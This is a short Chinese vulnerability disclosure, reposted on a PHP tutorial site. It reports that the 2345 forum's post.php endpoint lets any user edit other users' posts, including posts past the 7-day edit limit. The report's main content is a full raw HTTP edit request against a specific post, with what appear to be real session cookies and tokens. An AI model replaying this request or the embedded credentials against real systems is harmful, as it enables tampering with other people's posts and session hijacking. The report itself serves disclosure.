网站地图    收藏   

主页 > 后端 > 网站安全 >

2345论坛过滤不严可任意编辑他人帖子 - 网站安全

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 接口缺少过滤可以任意编辑他人帖子 任意编辑超过7天限制的帖子问题接口: post phpPOST post php HTTP 1 1Host: wangpai 2345 cnProxy-Connection: keep-aliveContent-Length: 193User-Agent: Mozilla 5 0...

接口缺少过滤可以任意编辑他人帖子/任意编辑超过7天限制的帖子


问题接口:/post.php
 

POST /post.php HTTP/1.1
Host: wangpai.2345.cn
Proxy-Connection: keep-alive
Content-Length: 193
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Origin: chrome-extension://kajfghlhfkcocafkcjlajldicbikpgnp
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: user_info=NjQ0ZXpGdEJwMk5rRTNVMi9PTnNWZXpzTUoxbXlxaHBnNk9FK2dKY21VYmlhajdvY1Ara01xU2h3RFlxU09Z; I=i%3D332053%26u%3D958194%26n%3D654188164%26t%3D1407067341.76247900%26s%3Db4bf332239352cff252f64303859bb0a%26v%3D1.0; PHPSESSID=nt2315hhj7a41583m0e8md0ui1

title=%b2%e2%ca%d4%b1%e0%bc%ad%cb%fb%c8%cb%cc%fb%d7%d3&isBright=1&content=%b2%e2%ca%d4%b1%e0%bc%ad%cb%fb%c8%cb%cc%fb%d7%d3&id=2491986&postid=2491986&act=edit_post&fid=13&page=&key=d274ec87aacec1c8728692cf578c5c29



以上代码可以编辑如下帖子

http://wangpai.2345.cn/thread.php?fid=13&pid=2491986


如果用这个漏洞编辑置顶帖子的话,危害挺大的吧

修复方案:

过滤吧- -

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论